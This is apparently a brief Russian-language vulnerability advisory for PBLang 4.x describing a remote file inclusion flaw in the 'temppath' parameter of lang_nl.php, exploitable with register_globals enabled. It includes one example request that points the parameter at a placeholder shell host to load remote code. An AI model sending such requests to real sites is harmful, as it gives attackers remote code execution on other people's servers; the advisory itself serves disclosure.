Программа: PBLang 4.x

Обнаруженная уязвимость в PBLang может быть использована, чтобы скомпрометировать уязвимую систему. Уязвимость возникает из-за того, что данные, передаваемые через параметр " temppath" неправильно обрабатываются в templates/pb/language/lang_nl.php.

Эксплуатирование уязвимости требует включение опции "register_globals".

Пример:

http://sitename.com/[Script Path]/templates/pb/language/lang_nl.php? temppath=http://SHELLURL.COM



Оставить мнение